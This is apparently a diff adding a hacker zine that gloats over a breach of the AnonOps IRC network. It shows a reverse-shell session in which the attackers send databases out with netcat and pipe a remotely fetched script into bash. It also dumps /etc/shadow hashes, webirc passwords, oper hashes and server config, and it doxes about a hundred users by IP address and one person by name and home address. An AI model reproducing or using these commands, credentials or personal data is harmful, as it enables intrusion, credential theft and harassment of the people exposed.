+<shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
+<module name="m_spanningtree.so">
+<module name="m_sslmodes.so">
+<module name="m_ssl_gnutls.so">
+<module name="m_sslinfo.so">
+<module name="m_stripcolor.so">
+<module name="m_svshold.so">
+<module name="m_swhois.so">
+<module name="m_timedbans.so">
+<module name="m_tline.so">
+#<module name="m_xline_db.so">
+
+#Mibbit Blocks
+<module name="m_cgiirc.so">
+<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
+    mask="64.62.228.82">
+<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
+    mask="207.192.75.252"> 
+<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
+    mask="78.129.202.38"> 
+<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
+    mask="109.169.29.95"> 
+
+# P0ke's WebIRC
+<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">
+
+
+                        :: 0x04 - b0x pwn ::
+
+[anonops@ns1 run]$ base64 utmp
+[anonops@ns1 etc]$ cat passwd
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/etc/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+pcap:x:77:77::/var/arpwatch:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+avahi:x:70:70:Avahi daemon:/:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+shitstorm:x:500:500::/home/shitstorm:/bin/bash
+anonops:x:501:501::/home/anonops:/bin/bash
+owen:x:502:502::/home/owen:/bin/bash
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+
+# IT GETS BETTER!
+[anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
+root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
+shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
+anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
+owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::
+
+                    :: 0x05 ~ 1pS ::
+                   
+# These were posted on pastebin, but it didnt seem to get as much attention
+# as whoever posted it wanted it to get. All these are from a vulnerable
+# CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
+# What a fucking idiot.
+
+ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
+ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
+ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
+AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
+Anon23845 95.140.125.37 free-125-37.mediaworksit.net
+AnonFin 194.110.178.3 mail2.paf.fi
+AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
+Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
+B2F 173.84.223.70
+Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
+C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
+CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
+Caleb 94.75.255.118 hosted-by.leaseweb.com
+DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
+DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
+Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
+Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
+FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
+GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
+HIv 95.140.125.37 free-125-37.mediaworksit.net
+Haze 12.18.245.219
+Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
+Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
+Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
+Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
+LOLOL 0.0.7.209
+LTD 174.127.99.174 174.127.99.174.static.midphase.com
+Lumina 186.188.228.113
+M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
+Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
+Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
+RetSnom 138.199.70.143
+Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
+ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
+Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
+Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
+Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
+Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
+UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
+Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
+anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
+anon4347 75.149.43.213 fabgraphics.com
+anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
+bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
+boho 173.23.64.22 173-23-64-22.client.mchsi.com
+br4incr4sh 81.56.209.237 server.abcdeflorent.com
+chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
+cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
+cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
+comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
+digger 0.0.0.2
+don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
+dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+e 209.212.149.109 za.l.to
+eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
+elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
+facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
+gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
+gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
+gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
+ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
+hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
+heckl 68.68.108.159
+imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
+k1tt3n 213.251.194.76
+k3ymaster 173.245.64.95
+koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
+lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
+locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
+loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
+madmaster 77.247.181.162 chomsky.torservers.net
+manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
+mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
+naSignal 193.138.216.101 tor-proxy.vm.31173.se
+nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
+nononn 46.239.119.58 host095577.olf.sgsnet.se
+nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
+opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
+pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
+ph33r 68.170.73.247 247.73.170.68.belairinternet.com
+phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
+qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
+risk 202.59.80.158
+savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
+sd 0.0.7.209
+sdk 201.82.181.124 c952b57c.virtua.com.br
+sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
+soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
+sprinkles 213.46.138.76 d138076.upc-d.chello.nl
+subz3r0e 41.202.225.156
+triPPy 173.245.64.183 173.245.64.160
+tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
+u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
+uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
+veritas 0.0.7.209
+workbench 50.71.143.81
+wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
+xent 77.247.181.162 chomsky.torservers.net
+zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
+zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
+zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
+zxcvsd 95.140.125.37 free-125-37.mediaworksit.net
+
+                    
+                   :: 0x06 ~ l0l sh1t ::
+
+Here's a bit of quotes we found funny.
+                            
+        _       _                       _                            
+       | |     | |                     (_)                           
+     __| | __ _| |__   ___   ___   __ _ _  ___ _ __ ___   __ _ _ __  
+    / _` |/ _` | '_ \ / _ \ / _ \ / _` | |/ _ \ '_ ` _ \ / _` | '_ \ 
+   | (_| | (_| | |_) | (_) | (_) | (_| | |  __/ | | | | | (_| | | | |
+    \__,_|\__,_|_.__/ \___/ \___/ \__, |_|\___|_| |_| |_|\__,_|_| |_|
+                                   __/ |                             
+                                  |___/                              
+                                                   
+<daboogieman> now that i'm an oper im no longer accepting PM's from anyone
+    because i feel that i have too much else to do ( being an oper and all)
+<daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
+    and /kill <nick>
+<daboogieman> any attempt by a non-oper to chat to me will be met by instand
+    gline and/or kill	
+        _      
+       (_)     
+  _ __  _  ___ 
+ | '_ \| |/ _ \
+ | |_) | |  __/
+ | .__/|_|\___|
+ | |           
+ |_|           
+
+
+<pie>!ban *!*@*
+<anon>what the fuck
+<pie>its ok i can do whatever i want because im drunk
+<pie>it will be fine in the morning
+                           
+               _      _     
+              | |    | |    
+      ___ __ _| | ___| |__  
+     / __/ _` | |/ _ \ '_ \ 
+    | (_| (_| | |  __/ |_) |
+     \___\__,_|_|\___|_.__/ 
+                        
+                        
+<Caleb>fuck my vps just got hacked with a ddos attack
+<Caleb>morning
+<Caleb>hi
+<Caleb>:3
+<Caleb>have a nice sleep? :3
+<Caleb>i had a good sleep
+<Caleb>eating my lunch now
+<Caleb>ohai
+<Caleb>ohai!
+<Caleb>ohai :3
+<Caleb>my computer seems to be fucking itself at 7000 rpms.
+<Caleb> just block the morons
+<Caleb>hmmm
+<Caleb>lol 
+<Caleb>sup!
+<Caleb>:3
+<Caleb>going to sleep for a bit bbl...
+<Caleb>How do you hack with a DDOS attack? 
+<Caleb>my shell just got hit with 77gbps
+<Caleb>im gonna destroy them when i find out who did it
+<Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed
+
+@CalebNewz: somehow their hitting my ip table.
+    _____      _____ _ __  
+   / _ \ \ /\ / / _ \ '_ \ 
+  | (_) \ V  V /  __/ | | |
+   \___/ \_/\_/ \___|_| |_|
+                           
+						 
+<owen>FUCK this box doesnt have wget we are screwed then
+<owen>[redacted] im fucking zlineing you because you're a movement traitor
+<owen>you dont even know who i really am and the connections i have
+<owen>i can just call in a favor and get your personal life ruined
+<owen>is there young boys here (over 18) who wanna have a chat in pm??
+<owen>you HAVE to install unreal to ~/Unreal3.2
+
+            _           _____     __
+      /\   | |         |__ \ \   / /
+     /  \  | |__   __ _   ) \ \_/ / 
+    / /\ \ | '_ \ / _` | / / \   /  
+   / ____ \| | | | (_| |/ /_  | |   
+  /_/    \_\_| |_|\__,_|____| |_|   
+                                    
+                                  
+<Aha2Y>if your servers getting DDoSed just mitigate the attack
+<Aha2Y>i have this awesome script i found on hackforums
+<Aha2Y>it blocks ip addresses
+<Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
+    it on my network
+<Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
+    so that means its DDoSing me right?
+<Aha2Y>i'll use my script of hackforums to block it
+
+    ____                       ____     _    _ _ 
+   |  _ \ _____      _____ _ _|___ \   / \  | | |
+   | |_) / _ \ \ /\ / / _ \ '__|__) | / _ \ | | |
+   |  __/ (_) \ V  V /  __/ |  / __/ / ___ \| | |
+   |_|   \___/ \_/\_/ \___|_| |_____/_/   \_\_|_|
+                                              
+@Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
+    leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
+    
+@Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
+    is deemed SAFE. I said it was online, not "SAFE", dipshit.
+@doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
+    That just smacks of gross negligence. Turn in your Guy Fawkes mask.
+    
+@Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
+    the provider.
+    
+@Power2All: Yes, they honeypotted my IP. Using mobile connection now.
+
+                            _                 
+     _ __ ___ _ __ ___  ___| | ___  ___ _ __  
+    | '__/ _ \ '_ ` _ \/ __| |/ _ \/ _ \ '_ \ 
+    | | |  __/ | | | | \__ \ |  __/  __/ |_) |
+    |_|  \___|_| |_| |_|___/_|\___|\___| .__/ 
+                                       |_|
+
+D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
+    Names:          Rick Bonata
+                    
+    Address	    221 FRANKLIN AVE
+                    CUYAHOGA FALLS, OH 44221
+                    
+
+<remsleep>i might launch at 666,666
+<remsleep>idk yet
+<remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
+<remsleep>it takes time to send orders to 180,000 zombies :p
+<remsleep>the time servers being down complicated the scanrio
+<remsleep>scenario                             
+<remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.
+
+<Ian>on average, the typical non-root server is 10mbps
+<remsleep>but as far as the world is concerned, i am just a host.
+<remsleep>Ian: yes
+<remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
+<Ian>so you are talking about
+<Ian>10,000,000mbps
+<remsleep>:)
+<Ian>10,000gbps
+<remsleep>heuheheuhehehe
+<Ian>10 terabits
+<remsleep>roughly.
+<remsleep>plus or minus
+<remsleep>it's take years
+<remsleep>and constant evasion of law enforcement
+<remsleep>i've got a direct line into NCIC via telnet.
+<remsleep>:D :D :D
+
+<remsleep>verified i have gov ip's on mah shit
+<remsleep>i am going to block ALL government ips
+<remsleep>http://www.uaff.info/militarytracking.htm
+<remsleep>fyi
+
+<remsleep>i mean if i was a giant corporate vpn provider and they offered me like
+    2 mill for some ips, i would give fake ips but i would do it for the $$ lol
+<remsleep>not the first time i've falsified logs for money ;p
+<remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
+    DHCP clients, I was getting radio signals beemed at my house :P
+<remsleep>@-@
+<remsleep>wonder how many warrants become invalid because of that little job :D
+<remsleep>chinanet is connected to me
+<remsleep>mother fuckers
+
+<remsleep> If the FBI does come, or whomever for whatever reason, I will have
+    them on camera with a live feed with a 3G modem backup streaming to one of
+    my VDSs. I would be unstopable after that, I would sue for false arrest,
+    kidnapping, conspiracy to each, general fuckery as well as a large sum of
+    punitive damages.
+
+<anon> Hey
+<anon> 221 FRANKLIN AVE
+<anon> CUYAHOGA FALLS, OH 4422
+<anon> Lucky for you, I'm not in your jurisdiction ;)
+<remsleep> So you're saying you're a cop?
+<remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
+    Falls Ohio
+<remsleep> and my dns whois, falsified as well. :\
+<anon> Yeah, ok
+<anon> You should probably just /quit
+<anon> If you continue to enable terrorist activity, I'll call someone who
+    DOES have jurisdiction
+<remsleep> ..
+<remsleep> Really?
+<anon> Really.
+<remsleep> Dude, call who you wanna call. I could care less. 
+<anon> Also, seriously?
+<anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
+    [remsleep] Memo to ANY Law Enforcement: You are compelled to
+    leave this network, failure to do so will result in whatever
+    evidence obtained being after this point will become sealed
+    and unusable in court. You are tresspasing, you have been warned.
+<anon> HAHAHAHAHA
+<anon> I've kicked down the doors of file sharers who had similar
+    notices attached to their servers
+
+                        :: 0x07 ~ FiL3z ::
+
+We've enclosed some fun files for your viewing pleasure. These are probably
+the best part of this dump.
+
+Filename            Description
+shadow              /etc/shadow, self explanatory
+oper.db             Anope Oper Database
+chan.db             Anope Channel Database
+nick.db             Anope NickServ Database
+keys.txt            AnonOps private ssl key/cert
+defaults.conf       InspIRCd Conf.
+nick.out.txt        Human readable NickServ database w/ cracked passwords,
+                    nickname aliases, registration times, seen times, memos (LOL)
+chan.out.txt        Huamn readable ChanServ database w/ cracked passwords,
+                    access lists, akick lists, badwords, ..etc.
+                    
+                        :: 0x08 ~ exit ::
+                        
+tl;dr JAJA ANONOPS ESTAN MUERTO.   (LOL DEAD)                     
+
+AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
+bring Anonymous back to the state it was, but we've burned the abonimation
+that took its place to the ground. For that, we are proud. We hope you enjoyed
+reading this little 'zine half as much as we enjoyed owning these
+pseudo-activitists for the Nth time. We've personally been responsible for
+nulling somewhere in the neighborhood of 50 of their servers, and will just
+keep dropping them as they put more back up. Ryan Cleary had the right idea,
+in trying to get Anons to spread out, but the namefags didn't want to listen.
+This time, we can only hope that they do.
+
+VIVA LA CARLOS1337!!!!!
+
+shoutz 2 kayla, robert cavanaugh, topiary & ryan cleary and zalgo irc trojan
+    for fighting the good fight.
+    
+

htp/HTP-Anonops2.txt

@@ -0,0 +1,817 @@
+888    888        d8888  .d8888b.  888    d8P  
+888    888       d88888 d88P  Y88b 888   d8P  
+888    888      d88P888 888    888 888  d8P    
+8888888888     d88P 888 888        888d88K    
+888    888    d88P  888 888        8888888b    
+888    888   d88P   888 888    888 888  Y88b  
+888    888  d8888888888 Y88b  d88P 888   Y88b  
+888    888 d88P     888  "Y8888P"  888    Y88b
+                             _____          
+8888888888 888           ,-:` \;',`'-
+888        888         .'-;_,;  ':-;_,'.
+888        888        /;   '/    ,  _`.-\
+8888888    888       | '`. (`     /` ` \`|
+888        888       |:.  `\`-.   \_   / |
+888        888       |     (   `,  .`\ ;'|
+888        888        \     | .'     `-'/
+8888888888 88888888    `.   ;/        .'
+                         `'-._____.-'`
+                                     
+8888888b.  888             d8888 888b    888 8888888888 88888888888        d8888
+888   Y88b 888            d88888 8888b   888 888            888           d88888
+888    888 888           d88P888 88888b  888 888            888          d88P888
+888   d88P 888          d88P 888 888Y88b 888 8888888        888         d88P 888
+8888888P"  888         d88P  888 888 Y88b888 888            888        d88P  888
+888        888        d88P   888 888  Y88888 888            888       d88P   888
+888        888       d8888888888 888   Y8888 888            888      d8888888888
+888        88888888 d88P     888 888    Y888 8888888888     888     d88P     888
+                <shitstorm> lol who the fuck is carlos
+                              CARLOS1337
+                               PRESENTE
+                          LOL ANONOPS MUERTO
+                           CERO DIA EDICION
+            
+ ┌─────────────────────────┐
+ │ :: Table of Contents :: │
+ ├─────────────────────────┤
+ │ 0x01 ~ Prefac3          │
+ ├─────────────────────────┤
+ │ 0x02 ~ s3rv1c3s pwn     │
+ ├─────────────────────────┤
+ │ 0x03 ~ iRCd pwn         │
+ ├─────────────────────────┤
+ │ 0x04 ~ b0x pwn          │
+ ├─────────────────────────┤
+ │ 0x05 ~ 1ps              │
+ ├─────────────────────────┤
+ │ 0x06 ~ l0l sh1t         │
+ ├─────────────────────────┤
+ │ 0x07 ~ FiL3z            │
+ ├─────────────────────────┤
+ │ 0x08 ~ ex1t             │
+ └─────────────────────────┘
+
+                            :: 0x01 - Prefac3 ::
+            
+    Over the course of the following months, it has become very clear to us that
+AnonOps no longer stands for the values of open speech, freedom of opinion and
+has instead transformed itself into a network rampent with trolls, abusive
+channel operators, and a generally unwelcoming place for those whom wish to
+communicate and gather to fight the powers of corruption, and those whom wish
+to censor our open internet. Various attempts have been made in the past to
+course correct AnonOps, but the totalitarian IRC operator regime has remained
+intact.
+    The AnonOps network prides itself in being "secure", however, such is not
+the case. Rather, they employ incompetent and highly unprofessional channel and 
+IRC operators, allowing their personal grudges to interfere with the operation
+of a secure network for Anonymous. Newcomers to the network are welcomed by a
+spirit of condescention and arrogance, as any legitimate question or concern is
+slowly drowned out by the laughter of the senior members of the chatroom.
+Channel operators rather than discourage such behavior, applaud it, joining in,
+and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
+to speak out against the way the network is ran is met with kick, ban, or zline.
+A decentralized organization such as Anonymous cannot thrive on a network ran by
+such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
+one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
+an idea; ideas are bulletproof. 
+    Anonymous cannot be owned or controlled by a small group of faggot
+totaltarian operators. Thus we have decided to lombotomize the cancer that is
+AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
+against us as an agent of censorship, unlulzy pseudo-activism and immense
+faggotry, and thus must be eliminated. 
+    AnonOps has proven itself insecure and fault prone in the past. We are here
+to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
+actions, they have proven themselves against our ideals. Welcome to thecourt of
+the internet, AnonOps. You shall be persecuted for your crimes against the
+freedom of chats, your utter and repeated failure as an IRC network, your aid to
+the spread of namefagging, and your gross negligence in securing the identities
+of those whom chat and remain Anonymous on your network. 
+    AnonOps has shown time and time again it is too large of a target, and very
+well capable of corrupting the ideals which fuels the fight in every Anon.
+As long as AnonOps stay online, they will continue to adulterate our cause,
+bastardizing ideals of Anonymous, and running a network where the only lulz to
+be had are that of the failures whom chat there and run the network. Such
+activity cannot continue. 
+
+Let's drop the formalities now, and get down to business!
+
+                        :: 0x02 - s3rv1c3s pwn ::
+                 ¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
+        ~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
+
+After probing AnonOps for quite a while, we figured out that they were using
+a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
+zero day we were able to get ourselves a reverse shell.
+
+ connect to [REDACTED] from 46.182.105.86 38604
+[anonops@ns1 ~]$ id
+uid=502(anonops) gid=502(anonops) groups=502(anonops)
+
+# Let's go ahead and snag ourselves some juicy files... 
+[anonops@ns1 ~]$ cd ~/inspircd/run/conf
+[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
+[anonops@ns1 conf]$ cd ~/services
+[anonops@ns1 services]$ nc htp 443 < nick.db
+[anonops@ns1 services]$ nc htp 443 < chan.db
+[anonops@ns1 services]$ nc htp 443 < oper.db
+[anonops@ns1 services]$ nc htp 443 < os_info.db
+
+# And then let's go ahead and hook services.
+[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
+[anonops@ns1 services]$ killall services; ./services; exit
+
+
+                         :: 0x02 - iRCd pwn ::
+                              ¡Dios Mios!
+
+<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
+
+<power hash="sha256"
+    diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
+    restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
+
+<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
+    hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
+    commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
+    modes="+xiw">
+    
+<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
+    hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
+    commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
+    modes="+xiw">
+
+<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
+    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
+    globalmax="5000" useident="no" modes="+xwi">
+<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
+    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
+    globalmax="5000" useident="no" modes="+wxi">
+<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
+    hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
+    globalmax="5000" useident="no" modes="+wxi">
+<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
+hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
+    globalmax="5000" useident="no" modes="+wxi">
+
+<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
+    softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
+    localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
+    
+<cidr ipv4clone="32" ipv6clone="128">
+<channels users="50" opers="100">
+<banlist chan="*" limit="128">
+<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
+    fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
+    cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
+    allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
+    serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
+    invitebypassmodes="no">
+<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
+    quietbursts="yes" nouserdns="no">
+<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
+    hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
+    maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
+    restrictbannedusers="yes" genericoper="yes" userstats="">
+<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
+    maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
+<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
+<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
+
+<badnick nick="ChanServ" reason="Reserved For Services">
+<badnick nick="NickServ" reason="Reserved For Services">
+<badnick nick="OperServ" reason="Reserved For Services">
+<badnick nick="MemoServ" reason="Reserved For Services">
+<badnick nick="BotServ" reason="Reserved For Services">
+<badnick nick="vHostServ" reason="Reserved For Services">
+<badhost host="IRCLOIC@*" reason="wrong server">
+
+<uline server="services.anonops.in" silent="yes">
+<uline server="defender.anonops.in" silent="yes">
+
+# Oper Classes
+<class name="Root"
+    commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
+    GRELOADMODULE CLEARCACHE">
+<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
+    GLOADMODULE GUNLOADMODULE SQUIT"
+    privs="users/auspex channels/auspex servers/auspex users/mass-message
+    channels/high-join-limit channels/set-permanent users/flood/no-throttle
+    users/flood/increased-buffers" usermodes="*" chanmodes="*">
+<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
+    CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
+<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
+    RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
+    channels/high-join-limit" usermodes="*" chanmodes="*">
+<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
+    chanmodes="*" privs="users/mass-message">
+<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
+    CHECK CHGNAME" usermodes="*" chanmodes="*">
+<class name="OperUnlag" privs="users/flood/no-throttle
+    users/flood/increased-buffers">
